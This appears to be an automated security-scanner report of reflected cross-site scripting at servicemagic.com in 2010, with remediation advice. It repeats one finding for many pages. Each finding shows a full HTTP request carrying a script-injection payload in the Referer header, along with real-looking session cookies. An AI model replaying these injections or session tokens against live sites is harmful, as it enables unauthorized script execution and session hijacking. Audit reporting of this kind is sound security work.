Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7424"><script>alert(1)</script>6128b904e50 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.servicemagic.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: psacn=; csdcn=1292169102045; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; psdcn=0; csacn=746971; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=223974937.793327017.1292169109.1292169109.1292169109.1; _chartbeat2=knuzeirfjkixxrjl Referer: http://www.google.com/search?hl=en&q=d7424"><script>alert(1)</script>6128b904e50
Response
HTTP/1.0 200 OK Set-Cookie: ServerID=1211; path=/ Date: Tue, 14 Dec 2010 19:16:43 GMT Server: Apache/2 Set-Cookie: JSESSIONID=08C2A6CA4BE5833D024BCD23B900D8F2.workerpr011-1; Path=/ Set-Cookie: psacn=746971; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/ Set-Cookie: csdcn=1292354203830; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/ Set-Cookie: originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/ Set-Cookie: psdcn=1292169102045; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/ Set-Cookie: csacn=746971; Expires=Fri, 13-Dec-2013 19:16:43 GMT; Path=/ P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f578"><script>alert(1)</script>81a2b13766c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article.home-improvement-library.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=3f578"><script>alert(1)</script>81a2b13766c
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:17 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb38"><script>alert(1)</script>d6ba1e262a9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article.show.8-Basement-Remodeling-Essentials.10576.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=edb38"><script>alert(1)</script>d6ba1e262a9
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:11 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf9d"><script>alert(1)</script>5b3f4e97503 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article.show.Atlanta-Carpet-Installation.15686.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=5bf9d"><script>alert(1)</script>5b3f4e97503
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:14 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a94"><script>alert(1)</script>cb75317f49e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Atlanta.GA.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=a3a94"><script>alert(1)</script>cb75317f49e
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:46 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71a0"><script>alert(1)</script>cb6682e40fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Charlotte.NC.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=a71a0"><script>alert(1)</script>cb6682e40fa
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:41 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a8b"><script>alert(1)</script>881748bde26 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Chicago.IL.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=e4a8b"><script>alert(1)</script>881748bde26
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:58 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad68"><script>alert(1)</script>b9ab75c9315 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Cleveland.OH.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=fad68"><script>alert(1)</script>b9ab75c9315
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:59 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bb5"><script>alert(1)</script>4635398da8b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Columbus.OH.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=40bb5"><script>alert(1)</script>4635398da8b
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:55 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91f10"><script>alert(1)</script>18c6c640ec3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Dallas.TX.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=91f10"><script>alert(1)</script>18c6c640ec3
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:54 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ab2"><script>alert(1)</script>f3fa1a57c71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Denver.CO.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=b2ab2"><script>alert(1)</script>f3fa1a57c71
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:54 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a673a"><script>alert(1)</script>896456e1914 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Houston.TX.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=a673a"><script>alert(1)</script>896456e1914
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:59 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978a0"><script>alert(1)</script>deb5be9dd76 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Indianapolis.IN.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=978a0"><script>alert(1)</script>deb5be9dd76
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:01 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2543d"><script>alert(1)</script>53604168ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Los_Angeles.CA.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=2543d"><script>alert(1)</script>53604168ed
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:18:53 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: ca
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44425"><script>alert(1)</script>eebaed718e6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c.Minneapolis.MN.html HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: psacn=746971; JSESSIONID=94DD7A28746411D05D165C244366D628.workerpr012-1; csdcn=1292354068641; _chartbeat2=knuzeirfjkixxrjl; __utmz=223974937.1292169109.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; ServerID=1212; originatingSessionID=1292169102045pwspr011033892595A378EBE2B0B50AEF68013D7.workerpr011-1; __utma=223974937.793327017.1292169109.1292169109.1292354056.2; psdcn=1292169102045; __utmc=223974937; __utmb=223974937.1.10.1292354056; csacn=746971; Referer: http://www.google.com/search?hl=en&q=44425"><script>alert(1)</script>eebaed718e6
Response
HTTP/1.0 200 OK Date: Tue, 14 Dec 2010 19:19:00 GMT Server: Apache/2 Vary: Accept-Encoding P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48428"><script>alert(1)</script>b7c6712ac0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
